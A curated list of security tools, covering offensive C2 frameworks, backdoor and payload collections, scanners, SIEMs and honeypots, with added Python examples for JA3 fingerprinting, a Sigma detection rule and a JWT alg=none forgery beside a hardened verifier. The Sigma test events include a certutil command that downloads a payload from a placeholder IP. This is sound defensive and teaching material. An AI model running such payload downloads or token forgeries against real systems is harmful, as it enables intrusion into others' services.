- Covenant - a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers: https://github.com/cobbr/Covenant
- SnitchDNS - a database-driven DNS server with a Web UI, written in Python and Twisted, that makes DNS administration easier, with all configuration changes applied instantly without restarting any system services: https://github.com/ctxis/SnitchDNS
- Prelude Operator - the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming: https://github.com/preludeorg | https://www.prelude.org/platform/operator | https://www.youtube.com/channel/UCZyx-PDZ_k7Vuzyqr4-qK9A
- ARTi-C2 - a modern execution framework built to empower security teams to scale attack scenario execution from single and multi-breach-point targets, with the intent to produce actionable attack intelligence that improves the effectiveness of security products and incident response: https://github.com/blackbotinc/Atomic-Red-Team-Intelligence-C2
- PowerSharpPack - many useful offensive C# projects wrapped into PowerShell for easy usage: https://github.com/S3cur3Th1sSh1t/PowerSharpPack
- zuthaka - a collaborative free open-source Command & Control integration framework that allows developers to concentrate on the core function and goal of their C2: https://github.com/pucarasec/zuthaka
- bantam - an advanced PHP backdoor management tool, with a lightweight server footprint, multi-threaded communication, and an advanced payload generation and obfuscation tool: https://github.com/gellin/bantam
- Hunt for C&C channels using Bro (now Zeek) and RITA: https://www.blackhillsinfosec.com/how-to-hunt-command-and-control-channels-using-bro-ids-and-rita/
- Sqrrl - hunting email headers: https://sqrrl.com/hunting-email-headers/
- Ultimate AppLocker Bypass List: https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/README.md
- List of binaries and scripts that can be used for other purposes than they are designed to: https://github.com/api0cradle/LOLBAS
- Endgame Malware BEnchmark for Research (ember): https://github.com/endgameinc/ember
- snake - malware storage, centralised and unified storage solution for malicious samples: https://github.com/countercept/snake
- rastrea2r - multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs): https://github.com/rastrea2r/rastrea2r
- operative-framework-HD - digital investigation framework; you can interact with websites, email addresses, companies, people, IP addresses, etc.: https://github.com/graniet/operative-framework-HD
- THRecon - Collect endpoint information for use in incident response triage / threat hunting / live forensics: https://github.com/TonyPhipps/THRecon
- Active Directory Kill Chain Attack & Defense: https://github.com/infosecn1nja/AD-Attack-Defense
- Free Blocklists of Suspected Malicious IPs and URLs: https://zeltser.com/malicious-ip-blocklists/
- Endgame event query language(EQL): https://github.com/endgameinc/eql/blob/master/README.md
- Awesome YARA - curated list of awesome YARA rules, tools, and resources: https://github.com/InQuest/awesome-yara/blob/master/README.md
- DeepBlueCLI - PowerShell Module for Threat Hunting via Windows Event Logs: https://github.com/sans-blue-team/DeepBlueCLI
- JA3 - a method for creating SSL/TLS client fingerprints that should be easy to produce on any platform and can be easily shared for threat intelligence: https://github.com/salesforce/ja3/blob/master/README.md
- zBang - is a special risk assessment tool that detects potential privileged account threats in the scanned network: https://github.com/cyberark/zBang/blob/master/README.md
- Pentesting with certutil: https://www.hackingarticles.in/windows-for-pentester-certutil/
- Tool-X - is a Kali Linux hacking tools installer for Termux and linux system: https://github.com/Rajkumrdusad/Tool-X
- JPCERT/CC Tool Analysis Result Sheet - summarizes the results of examining logs recorded in Windows upon execution of 49 tools that are likely to be used by an attacker who has infiltrated a network: https://jpcertcc.github.io/ToolAnalysisResultSheet/#
- Slingshot C2 Matrix Edition - made in collaboration with SANS, Ryan O'Grady, and C2 Matrix contributors. The goal is to lower the learning curve of installing each C2 framework and getting you straight to testing which C2s work against your organization: https://howto.thec2matrix.com/slingshot-c2-matrix-edition
- uncoder.io - online translator for SIEM saved searches, filters, queries, API requests, correlation and Sigma rules to help SOC Analysts, Threat Hunters and SIEM Engineers: https://uncoder.io/
- F-secure - Attack Detection Fundamentals: https://labs.f-secure.com/blog/attack-detection-fundamentals-initial-access-lab-1/
- PwnDoc - a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report: https://github.com/pwndoc/pwndoc
- ThreatPursuit-VM - MANDIANT THREAT INTELLIGENCE VM: https://github.com/fireeye/ThreatPursuit-VM
- KQL Internals: https://identityandsecuritydotcom.files.wordpress.com/2020/08/kql_internals_hk.pdf
- jarm - an active Transport Layer Security (TLS) server fingerprinting tool (by Salesforce): https://github.com/salesforce/jarm
- BruteShark - a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files): https://github.com/odedshimon/BruteShark
- Name-that-hash - will name that hash type: https://github.com/HashPals/Name-That-Hash
- Windows & Active Directory Exploitation Cheat Sheet and Command Reference: https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
- nzyme - a free and open WiFi defense system that detects and physically locates threats using an easy to build and deploy sensor system: https://www.nzyme.org/
- Certified Pre-Owned - Abusing Active Directory Certificate Services: https://posts.specterops.io/certified-pre-owned-d95910965cd2
- pimpmykali - a shell script that fixes a bunch of bugs on Kali Linux virtual machines: https://github.com/Dewalt-arch/pimpmykali
- RedEye - an open-source analytic tool developed by CISA and DOE's Pacific Northwest National Laboratory to assist Red Teams with visualizing and reporting command and control activities: https://github.com/cisagov/RedEye/
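The JA3 entry above names the fingerprint but not how it is derived. The following is an added example, my own code rather than anything from the JA3 repository: it parses a TLS ClientHello, drops GREASE values as the JA3 specification requires, and builds the JA3 string (decimal TLS version, cipher suites, extension types, supported groups, EC point formats, each list joined with `-` and the five fields joined with `,`) and its MD5. The ClientHello bytes are constructed inline with the `build_client_hello` helper; the hostname, cipher list and extension order are arbitrary test values, not a real client's.

```python
import hashlib
import struct

# GREASE values (RFC 8701) are excluded from JA3 strings.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}


def _u16s(data: bytes) -> list:
    """Unpack a buffer of big-endian 16-bit values."""
    return [v for (v,) in struct.iter_unpack(">H", data)]


def ja3_from_client_hello(hs: bytes):
    """Return (ja3_string, ja3_md5) for a ClientHello.

    Accepts either a bare Handshake message (first byte 0x01) or a full TLS
    record (first byte 0x16), in which case the 5-byte record header is skipped.
    """
    if hs[0] == 0x16:
        hs = hs[5:]
    assert hs[0] == 1, "not a ClientHello"
    pos = 4                                     # HandshakeType(1) + length(3)
    version = struct.unpack(">H", hs[pos:pos + 2])[0]; pos += 2
    pos += 32                                   # client random
    sid_len = hs[pos]; pos += 1 + sid_len       # session id
    cs_len = struct.unpack(">H", hs[pos:pos + 2])[0]; pos += 2
    ciphers = [c for c in _u16s(hs[pos:pos + cs_len]) if c not in GREASE]
    pos += cs_len
    cm_len = hs[pos]; pos += 1 + cm_len         # compression methods
    exts, curves, formats = [], [], []
    if pos < len(hs):
        ext_len = struct.unpack(">H", hs[pos:pos + 2])[0]; pos += 2
        end = pos + ext_len
        while pos < end:
            etype, elen = struct.unpack(">HH", hs[pos:pos + 4]); pos += 4
            body = hs[pos:pos + elen]; pos += elen
            if etype in GREASE:
                continue
            exts.append(etype)
            if etype == 0x000a:                 # supported_groups (elliptic curves)
                n = struct.unpack(">H", body[:2])[0]
                curves = [g for g in _u16s(body[2:2 + n]) if g not in GREASE]
            elif etype == 0x000b:               # ec_point_formats
                n = body[0]
                formats = list(body[1:1 + n])
    ja3 = ",".join([
        str(version),
        "-".join(map(str, ciphers)),
        "-".join(map(str, exts)),
        "-".join(map(str, curves)),
        "-".join(map(str, formats)),
    ])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(version: int, ciphers: list, extensions: list) -> bytes:
    """Build a minimal ClientHello Handshake message (constructed test input only)."""
    body = struct.pack(">H", version) + b"\x00" * 32 + b"\x00"   # version, random, empty session id
    cs = b"".join(struct.pack(">H", c) for c in ciphers)
    body += struct.pack(">H", len(cs)) + cs
    body += b"\x01\x00"                                          # one compression method: null
    ext = b"".join(struct.pack(">HH", t, len(v)) + v for t, v in extensions)
    body += struct.pack(">H", len(ext)) + ext
    return b"\x01" + len(body).to_bytes(3, "big") + body


# Constructed sample: a GREASE cipher, GREASE extension and GREASE group are
# present so the filtering path is exercised.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x1a1a, 0x1301, 0x1302, 0xc02b, 0xc02f],
    [
        (0x2a2a, b""),                                      # GREASE extension, dropped
        (0x0000, b"\x00\x0e\x00\x00\x0bexample.com"),       # server_name
        (0x000a, b"\x00\x06\x3a\x3a\x00\x1d\x00\x17"),      # supported_groups: GREASE, x25519, secp256r1
        (0x000b, b"\x01\x00"),                              # ec_point_formats: uncompressed
        (0x0010, b"\x00\x0c\x02h2\x08http/1.1"),            # ALPN
    ],
)

if __name__ == "__main__":
    print(*ja3_from_client_hello(SAMPLE_HELLO))
```

The same fields in the same order, taken from the server's ServerHello, give JA3S; JARM (listed further down) is a different, active technique and its hashes are not comparable with JA3.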
- honeybits - spread breadcrumbs & honeytokens: https://github.com/0x4D31/honeybits
- DTAG (T-Pot creators): https://github.com/dtag-dev-sec
- RockNSM (IDS) installation notes from SANS: https://isc.sans.edu/diary/rss/22832
- Security Onion 2 - free and open source Linux distribution for threat hunting, enterprise security monitoring, and log management. It includes TheHive, Playbook and Sigma, Fleet and osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, Zeek, Wazuh, and many other security tools: https://securityonionsolutions.com/software/ | https://docs.securityonion.net/en/2.3/about.html
- unfetter: https://github.com/unfetter-analytic/unfetter
- portspoof: https://github.com/drk1wi/portspoof
- GeoLogonalyzer - a utility to perform location and metadata lookups on source IP addresses of remote access logs: https://github.com/fireeye/GeoLogonalyzer
- Dejavu - open source deception framework which can be used to deploy multiple interactive decoys: https://github.com/bhdresh/Dejavu
- capa - detects capabilities in executable files. You run it against a PE file or shellcode and it tells you what it thinks the program can do: https://github.com/mandiant/capa
- gravwell-community-edition: https://www.gravwell.io/blog/gravwell-community-edition
- logz.io: https://logz.io/
- SIEMonster: https://siemonster.com/
- Dsiem - Dsiem is a security event correlation engine for ELK stack, allowing the platform to be used as a dedicated and full-featured SIEM system: https://github.com/defenxor/dsiem
- siembol - provides a scalable, advanced security analytics framework based on open-source big data technologies. Siembol normalizes, enriches, and alerts on data from various sources, which allows security teams to respond to attacks before they become incidents: https://github.com/G-Research/siembol
- CyberSponse - community edition: https://cybersponse.com/community-edition/
- Dflabs - community edition: https://www.dflabs.com/incman-soar-community-edition/
- TheHive - a scalable, open source and free Security Incident Response Platform, tightly integrated with MISP: https://thehive-project.org/
- Sigma - generic and open signature format that allows you to describe relevant log events in a straight forward manner: https://github.com/Neo23x0/sigma | https://github.com/socprime/SigmaUI
- MozDef - The Mozilla Enterprise Defense Platform (MozDef) seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers: https://github.com/mozilla/MozDef
- OpenCTI - unified platform for all levels of Cyber Threat Intelligence: https://www.opencti.io/en/
- Wazuh - enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance: https://wazuh.com/
- spidertrap - trap web crawlers and spiders in an infinite set of dynamically generated webpages: https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Spidertrap.md
- ElastAlert - a simple framework for alerting on anomalies, spikes, or other patterns of interest from data in Elasticsearch: https://github.com/Yelp/elastalert
- Glastopf - a Python web application honeypot founded by Lukas Rist: https://github.com/mushorg/glastopf
- Conpot - a low-interaction server-side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend: http://conpot.org/
- jimi - an automation first no-code platform designed and developed originally for Security Orchestration and Response: https://github.com/z1pti3/jimi
- Malcolm - an easily deployable network analysis tool suite for full packet capture artifacts (PCAP files) and Zeek logs: https://github.com/idaholab/Malcolm/blob/master/README.md
- HoneyDB - provides real time data of honeypot activity. This data comes from honeypot sensors deployed globally on the Internet: https://honeydb.io/
- saferwall - malware analysis platform: https://github.com/saferwall/saferwall
- secureCodeBox - a docker based, modularized toolchain for continuous security scans of your software project: https://github.com/secureCodeBox/secureCodeBox
- NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine: https://github.com/PaytmLabs/nerve
- CHAPS - is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed: https://github.com/cutaway-security/chaps
- Brim - open source desktop application for security and network specialists. Brim makes it easy to search and analyze data from packet captures like those created by Wireshark and structured logs, especially from the Zeek network analysis framework: https://github.com/brimsec/brim
- OpenUBA - a flexible open source UEBA platform used for security analytics: http://openuba.org/
- Intel Owl - OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale: https://github.com/intelowlproject/IntelOwl
- Intrigue Core - open attack surface enumeration engine. It integrates and orchestrates a wide variety of security data sources, distilling them into a normalized object model: https://core.intrigue.io/
- Awesome CobaltStrike Defence: https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence
- Crossfeed - a tool that continuously enumerates and monitors an organization's public-facing attack surface in order to discover assets and flag potential security flaws: https://github.com/cisagov/crossfeed
- Awesome Incident Response - https://github.com/meirwah/awesome-incident-response
- dradis-ce - an open-source collaboration framework, tailored to InfoSec teams: https://github.com/dradis/dradis-ce
- APTRS (Automated Penetration Testing Reporting System) - The tool allows Penetration testers to create a report directly without using the Traditional Docx file. It also provides an approach to keeping track of the projects and vulnerabilities: https://github.com/Anof-cyber/APTRS
- osquery-defense-kit - production-ready detection & response queries for osquery: https://github.com/chainguard-dev/osquery-defense-kit
- sandboxprofiler - collect information of internet-connected sandboxes, no backend needed. This is achieved using telegram and interact.sh to collect data, however custom listeners are also supported: https://gitlab.com/brn1337/sandboxprofiler
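The Sigma entry above says the format describes log events "in a straightforward manner"; the detection section is in fact simple enough that a small evaluator shows exactly how a rule is applied. The following is an added example, my own code rather than anything from the Sigma project (in practice rules are converted with sigma-cli / pySigma into the SIEM's query language rather than evaluated directly). The rule is my own, modelled on the certutil download technique from the "Pentesting with certutil" entry listed earlier: it matches `certutil.exe` process creations whose command line contains both `urlcache` and `http`, and filters out downloads from a hypothetical internal PKI host. The four process-creation events are constructed; the field names follow the Sysmon-style `process_creation` log source, and the IP address is from the RFC 5737 documentation range.

```python
# Sigma matching is case-insensitive; modifiers are appended to the field name
# with '|', e.g. "CommandLine|contains|all".  Only the modifiers used by
# typical process_creation rules are implemented here.

CERTUTIL_DOWNLOAD_RULE = {
    "title": "Certutil Download From Remote Host (example rule)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        # hypothetical internal PKI host whose CRL/cert fetches are expected
        "filter_internal": {"CommandLine|contains": "http://pki.corp.example/"},
        "condition": "selection and not filter_internal",
    },
}


def _match_value(actual, pattern, mods):
    a, p = str(actual).lower(), str(pattern).lower()
    if "contains" in mods:
        return p in a
    if "startswith" in mods:
        return a.startswith(p)
    if "endswith" in mods:
        return a.endswith(p)
    return a == p


def _match_field(event, key, patterns):
    field, *mods = key.split("|")
    if field not in event:
        return False
    pats = patterns if isinstance(patterns, list) else [patterns]
    hits = [_match_value(event[field], p, mods) for p in pats]
    return all(hits) if "all" in mods else any(hits)   # list = OR unless |all


def _match_selection(sel, event):
    if isinstance(sel, list):          # list of maps = OR of maps
        return any(_match_selection(s, event) for s in sel)
    return all(_match_field(event, k, v) for k, v in sel.items())   # map = AND


def _eval_condition(cond, results):
    """Evaluate a condition built from identifiers, and/or/not and parentheses."""
    tokens = cond.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def parse_or():
        nonlocal pos
        v = parse_and()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            r = parse_and()
            v = v or r
        return v

    def parse_and():
        nonlocal pos
        v = parse_not()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            r = parse_not()
            v = v and r
        return v

    def parse_not():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "not":
            return not parse_not()
        if tok == "(":
            v = parse_or()
            pos += 1                   # consume ')'
            return v
        return results[tok]

    return parse_or()


def sigma_match(rule, event) -> bool:
    det = rule["detection"]
    results = {name: _match_selection(sel, event)
               for name, sel in det.items() if name != "condition"}
    return _eval_condition(det["condition"], results)


def run_rule(rule, events) -> list:
    return [sigma_match(rule, e) for e in events]


# Constructed process_creation events.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/payload.exe C:\\Users\\Public\\p.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -URLCache -f http://pki.corp.example/root.crt root.crt"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile file.iso SHA256"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c certutil -urlcache http://x"},
]

if __name__ == "__main__":
    print(run_rule(CERTUTIL_DOWNLOAD_RULE, EVENTS))
```

Only the first event fires: the second is the filtered internal PKI fetch, the third has no download switch, and the fourth is `cmd.exe` carrying certutil in its arguments, which a rule keyed on `Image` does not see (a separate rule on the child process would).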
- Automatic API Attack Tool - Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output: https://github.com/imperva/automatic-api-attack-tool
- Taipan - an automated web application vulnerability scanner that allows to identify web vulnerabilities in an automatic fashion: https://github.com/enkomio/Taipan/blob/master/README.md
- fuzz-lightyear - pytest-inspired, DAST framework, capable of identifying vulnerabilities in a distributed, micro-service ecosystem through stateful Swagger fuzzing: https://github.com/Yelp/fuzz-lightyear/blob/master/README.md
- GoSpider - fast web spider written in Go: https://github.com/jaeles-project/gospider
- XSS-Freak - XSS scanner fully written in python3. It crawls the website for all possible links and directories to expand its attack scope, then searches them for input tags and launches a set of XSS payloads: https://github.com/hacker900123/XSS-Freak
- vulnx - intelligent bot auto shell injector that detects vulnerabilities in multiple types of CMS: https://github.com/anouarbensaad/vulnx
- Astra - REST API penetration testing tool: https://github.com/flipkart-incubator/Astra
- finalrecon - fast and simple python script for web reconnaissance: https://github.com/thewhiteh4t/finalrecon
- Payloads - A collection of web attack payloads: https://github.com/foospidy/payloads
- AuthMatrix - an extension to Burp Suite that provides a simple way to test authorization in web applications and web services: https://github.com/SecurityInnovation/AuthMatrix
- shhgit - finds secrets and sensitive files across GitHub (including Gists), GitLab and BitBucket committed in near real time: https://github.com/eth0izzle/shhgit
- Sken - one tool to do all scans. Sken packages and manages open source scanners across all scan types, adds a SaaS orchestration layer and automates them in CI/CD: https://www.sken.ai/
- Hack-Tools - the all-in-one Red Team browser extension for Web Pentesters: https://github.com/LasCC/Hack-Tools
- feroxbuster - a simple, fast, recursive content discovery tool written in Rust: https://github.com/epi052/feroxbuster
- Jaeles - a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner: https://github.com/jaeles-project/jaeles
- tamper.dev - an extension that allows you to edit HTTP/HTTPS requests and responses as they happen without the need of a proxy: https://tamper.dev/
- proxify - Swiss Army Knife Proxy for rapid deployments. Supports multiple operations such as request/response dump, filtering and manipulation via DSL language, upstream HTTP/Socks5 proxy: https://github.com/projectdiscovery/proxify
- XSSTRON - Powerful Chromium Browser to find XSS Vulnerabilites automatically while browsing web: https://github.com/RenwaX23/XSSTRON
- AutoRepeater - Automated HTTP Request Repeating With Burp Suite: https://github.com/nccgroup/AutoRepeater
- xsshunter - allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service: https://xsshunter.com/
- vajra - automated web hacking framework to automate boring recon tasks and the same scans for multiple targets during web application penetration testing. Vajra has a highly customizable target-scope-based scan feature: https://github.com/r3curs1v3-pr0xy/vajra
- MindAPI - a mindmap which combines years of experience in testing API security: https://github.com/dsopas/MindAPI
- gotestwaf - Go project to test different web application firewalls (WAF) for detection logic and bypasses; simulates API and OWASP attacks over a wide range of API protocols including REST, GraphQL, gRPC, WebSockets, SOAP and XML-RPC: https://github.com/wallarm/gotestwaf
- kiterunner - API and content discovery at lightning fast speeds, bruteforcing routes/endpoints in modern applications: https://github.com/assetnote/kiterunner
- Epiphany - a pre-engagement / self-assessment tool to identify weak spots of a web property from a DDoS attacker's perspective: https://github.com/Cyberlands-io/epiphany
- jwtXploiter - a tool to test security of JSON Web Tokens. Test a JWT against all known CVEs: https://github.com/DontPanicO/jwtXploiter
- rengine - an automated reconnaissance framework for web applications with a focus on a highly configurable, streamlined recon process via Engines, recon data correlation and organization, continuous monitoring, backed by a database and a simple yet intuitive user interface: https://github.com/yogeshojha/rengine
- graphw00f - inspired by wafw00f is the GraphQL fingerprinting tool for GQL endpoints, it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default: https://github.com/dolevf/graphw00f
- changeme - focuses on detecting default and backdoor credentials and not necessarily common credentials. Its default mode is to scan HTTP default credentials, but it has support for other credentials: https://github.com/ztgrace/changeme
- dalfox - a powerful open source XSS scanning tool and parameter analyzer that speeds up the process of detecting and verifying XSS flaws: https://github.com/hahwul/dalfox
- hakoriginfinder - Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies: https://github.com/hakluke/hakoriginfinder
- JavaScript obfuscator - a powerful free obfuscator for JavaScript, containing a variety of features which provide protection for your source code: https://github.com/javascript-obfuscator/javascript-obfuscator
- caido - a lightweight web security auditing toolkit. Built from the ground up in Rust, Caido aims to help security professionals and enthusiasts audit web applications with efficiency and ease: https://caido.io/
- metlo - Create an Inventory of all your API Endpoints. Proactively test your APIs before they go into production. Detect API attacks in real time: https://github.com/metlo-labs/metlo
- dastardly - a lightweight web application security scanner for your CI/CD pipeline: https://portswigger.net/burp/dastardly
- burp-awesome-tls - this extension hijacks Burp's HTTP/TLS stack and allows you to spoof any browser fingerprint in order to make it more powerful and less prone to fingerprinting by all kinds of WAFs: https://github.com/sleeyax/burp-awesome-tls
- IPRotate_Burp_Extension - extension for Burp Suite which uses AWS API Gateway to change your IP on every request: https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension
- FireProx - FireProx leverages the AWS API Gateway to create pass-through proxies that rotate the source IP address with every request: https://github.com/ustayready/fireprox
- gigaproxy - a tool designed to rotate IPs using mitmproxy, AWS API Gateway, and Lambda: https://github.com/Sprocket-Security/gigaproxy
- sign-saboteur - a Burp Suite extension for editing, signing, verifying, and attacking signed tokens. It supports different types of tokens: https://github.com/d0ge/sign-saboteur
- ShadowClone - allows you to distribute your long running tasks dynamically across thousands of serverless functions and gives you the results within seconds where it would have taken hours to complete: https://github.com/fyoorer/ShadowClone
- jwt-hack - Hack the JWT(JSON Web Token): https://github.com/hahwul/jwt-hack
- GAP-Burp-Extension - an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing: https://github.com/xnl-h4ck3r/GAP-Burp-Extension
- domloggerpp - a browser extension that allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations: https://github.com/kevin-mizu/domloggerpp
- http-garden - a collection of HTTP servers and proxies configured to be composable, along with scripts to interact with them in a way that makes finding vulnerabilities much much easier: https://github.com/narfindustries/http-garden
- sj (Swagger Jacker) - a command line tool designed to assist with auditing of exposed Swagger/OpenAPI definition files by checking the associated API endpoints for weak authentication. It also provides command templates for manual vulnerability testing: https://github.com/BishopFox/sj
- GraphQLer - a cutting-edge tool designed to dynamically test GraphQL APIs with a focus on awareness. It offers a range of sophisticated features that streamline the testing process and ensure robust analysis of GraphQL APIs such as being able to automatically read a schema and run tests against an API using the schema: https://github.com/omar2535/GraphQLer
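jwtXploiter and jwt-hack (listed above) automate attacks on JSON Web Tokens; the most basic of them, `alg=none`, only works because a verifier lets the token's own header choose the algorithm. The following added example is my own code (no PyJWT dependency, and not taken from either tool): a minimal HS256 signer, an attacker-side forger that emits an unsigned `alg=none` token, a verifier that reproduces the bug, and a hardened verifier that pins the algorithm server-side. Key and claims are constructed test values.

```python
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _compact(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(claims: dict, key: bytes) -> str:
    """Server-side: issue a properly signed HS256 token."""
    header = _b64url(_compact({"alg": "HS256", "typ": "JWT"}))
    payload = _b64url(_compact(claims))
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def forge_alg_none(claims: dict) -> str:
    """Attacker-side: any claims, 'alg':'none', empty signature segment."""
    header = _b64url(_compact({"alg": "none", "typ": "JWT"}))
    return f"{header}.{_b64url(_compact(claims))}."


def verify_vulnerable(token: str, key: bytes):
    """Trusts the header to select the algorithm: the classic bug."""
    h, p, s = token.split(".")
    header = json.loads(_b64url_decode(h))
    if header.get("alg") == "none":                      # attacker-controlled branch
        return json.loads(_b64url_decode(p))             # no signature check at all
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(s)):
            return json.loads(_b64url_decode(p))
    return None


def verify_hardened(token: str, key: bytes, expected_alg: str = "HS256"):
    """Algorithm is fixed by the server; anything else in the header is rejected
    before any signature logic runs (this is what an 'algorithms=[...]' allow-list
    in a real library does)."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(_b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != expected_alg:
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):   # constant-time compare
        return None
    return json.loads(_b64url_decode(p))


if __name__ == "__main__":
    key = b"constructed-demo-key"                                  # constructed, not a real secret
    forged = forge_alg_none({"sub": "alice", "admin": True})
    print("vulnerable accepts forged token:", verify_vulnerable(forged, key))
    print("hardened accepts forged token:  ", verify_hardened(forged, key))
```

The same shape of fix covers RS256-to-HS256 key confusion: a verifier that accepts whatever `alg` the header names will happily treat the public key as an HMAC secret, and pinning the algorithm (and the key type that goes with it) is what closes that path too.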
- HTML5: http://html5sec.org/
- OWASP: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- Reddit: https://www.reddit.com/r/xss/
- Js payloads, great tutorials: http://www.xss-payloads.com/index.html
- Powerful web tool for creating event-based payloads: http://brutelogic.com.br/webgun/
- Ultimate XSS protection Cheatsheet: https://xenotix.in/The%20Ultimate%20XSS%20Protection%20Cheat%20Sheet%20for%20Developers.pdf
- HTML5 attack Vectors: https://dl.packetstormsecurity.net/papers/attack/HTML5AttackVectors_RafayBaloch_UPDATED.pdf
- XSS Vulnerability Payload List: https://github.com/ismailtasdelen/xss-payload-list
- PortSwigger XSS cheat-sheet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- serverless-prey - a collection of serverless functions (FaaS), that, once launched to a cloud environment and invoked, establish a TCP reverse shell, enabling the user to introspect the underlying container: https://github.com/pumasecurity/serverless-prey
- Deepfence Runtime Threat Mapper - is a subset of the Deepfence cloud native workload protection platform, released as a community edition: https://github.com/deepfence/ThreatMapper/blob/master/README.md
- Dow Jones Hammer - a multi-account cloud security tool for AWS. It identifies misconfigurations and insecure data exposures within most popular AWS resources, across all regions and accounts: https://github.com/dowjones/hammer/blob/master/README.md
- SkyArk - a cloud security project with two main scanning modules, AzureStealth and AWStealth: https://github.com/cyberark/SkyArk
- Prowler - a command line tool for AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness: https://github.com/toniblyx/prowler
- cloudsploit (Aqua) - an open-source project designed to allow detection of security risks in cloud infrastructure accounts: https://github.com/aquasecurity/cloudsploit
- deepfence SecretScanner - helps users scan their container images or local directories on hosts and outputs JSON file with details of all the secrets found: https://github.com/deepfence/SecretScanner
- OpenCSPM - an open-source platform for gaining deeper insight into your cloud configuration and metadata to help understand and reduce risk over time: https://github.com/OpenCSPM/opencspm
- endgame - An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire Internet: https://endgame.readthedocs.io/en/latest/
- rpCheckup - an AWS resource policy security checkup tool that identifies public, external account access, intra-org account access, and private resources. It makes it easy to reason about resource visibility across all the accounts in your org: https://github.com/goldfiglabs/rpCheckup
- cloudmapper - helps you analyze your Amazon Web Services (AWS) environments. The original purpose was to generate network diagrams and display them in your browser. It now contains much more functionality, including auditing for security issues: https://github.com/duo-labs/cloudmapper
- netz - discover an internet-wide misconfiguration of network components like web-servers/databases/cache-services and more: https://github.com/SpectralOps/netz
- red-shadow - scan your AWS IAM Configuration for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups discovered by Lightspin's Security Research Team: https://github.com/lightspin-tech/red-shadow
- Principal Mapper - script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization: https://github.com/nccgroup/PMapper | https://research.nccgroup.com/2021/03/29/tool-release-principal-mapper-v1-1-0-update/
- Patrolaroid - an instant camera for capturing cloud workload risks. It’s a prod-friendly scanner that makes finding security issues in AWS instances and buckets less annoying and disruptive for software engineers and cloud admins: https://github.com/rpetrich/patrolaroid
